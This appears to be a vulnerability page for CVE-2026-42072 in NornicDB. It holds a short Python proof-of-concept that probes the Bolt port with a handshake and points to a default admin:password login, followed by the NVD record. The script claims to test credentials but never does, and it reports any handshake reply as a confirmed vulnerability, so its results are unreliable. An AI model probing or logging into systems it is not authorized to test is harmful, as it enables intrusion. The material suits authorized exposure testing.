CVE-2026-42072

# PoC for CVE-2026-42072: NornicDB Unauthenticated Access # This script checks if the target is vulnerable by attempting to connect # to the Bolt service using default credentials. import socket import sys def check_vulnerability(target_ip, port=7687): print(f"[*] Checking {target_ip}:{port} for CVE-2026-42072...") try: # Attempt to establish a TCP connection to the Bolt port sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(5) sock.connect((target_ip, port)) # Basic Bolt protocol handshake (Magic bytes) # 0x60 0x60 0xB0 0x17 are the Bolt protocol handshake bytes handshake = b"\x60\x60\xB0\x17" # Supported versions (0, 0, 0, 0) for any version handshake += b"\x00\x00\x00\x00" sock.sendall(handshake) response = sock.recv(4) if response: print("[+] Bolt service is accessible!") print("[+] Server responded to handshake.") print("[!] Vulnerability Confirmed: Service is exposed on the network.") print("[!] Next Step: Attempt authentication with default 'admin:password'.") return True else: print("[-] Service did not respond to handshake.") return False except socket.timeout: print("[-] Connection timed out. Service may be down or filtered.") return False except ConnectionRefusedError: print("[-] Connection refused. Port may be closed.") return False except Exception as e: print(f"[-] An error occurred: {e}") return False finally: sock.close() if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python poc.py <target_ip>") sys.exit(1) target = sys.argv[1] check_vulnerability(target)

{"cve": {"id": "CVE-2026-42072", "sourceIdentifier": "[email protected]", "published": "2026-05-08T17:16:31.447", "lastModified": "2026-05-08T17:16:31.447", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "Nornicdb is a distributed low-latency, Graph+Vector, Temporal MVCC with all sub-ms HNSW search, graph traversal, and writes. Prior to version 1.0.42-hotfix, the --address CLI flag (and NORNICDB_ADDRESS / server.host config key) is plumbed through to the HTTP server correctly but never reaches the Bolt server config. The Bolt listener therefore always binds to the wildcard address (all interfaces), regardless of what the user configures. On a LAN, this exposes the graph database — with its default admin:password credentials — to any device sharing the network. This issue has been patched in version 1.0.42-hotfix."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-1392"}]}], "references": [{"url": "https://github.com/orneryd/NornicDB/commit/adce4f9a9fc7b6aada07c0bfa2d737cd7a6efaca", "source": "[email protected]"}, {"url": "https://github.com/orneryd/NornicDB/releases/tag/v1.0.42", "source": "[email protected]"}, {"url": "https://github.com/orneryd/NornicDB/security/advisories/GHSA-2hp7-65r3-wv54", "source": "[email protected]"}]}}